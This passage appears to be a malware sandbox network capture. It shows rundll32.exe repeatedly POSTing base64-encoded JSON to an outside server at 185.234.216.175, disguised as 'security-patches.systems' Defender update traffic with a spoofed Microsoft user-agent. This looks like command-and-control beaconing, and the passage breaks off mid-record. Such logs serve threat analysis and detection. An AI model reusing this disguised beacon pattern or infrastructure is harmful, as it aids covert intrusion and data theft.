Dec 6, 2024 22:12:08.158895969 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49779	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:08.425560951 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:09.861499071 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49785	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:10.135221004 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:11.593664885 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49790	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:11.913883924 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:13.393563986 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49796	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:13.660819054 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:15.120034933 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49798	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:15.381815910 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:16.833276987 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49804	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:17.098047018 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:18.564224958 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49810	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:18.832097054 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:20.301547050 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49815	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:20.566826105 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:22.083417892 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49817	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:22.347698927 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:23.804763079 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49823	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:24.175471067 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:25.627681971 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49828	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:25.897321939 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:27.357681036 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49833	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:27.628566027 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: 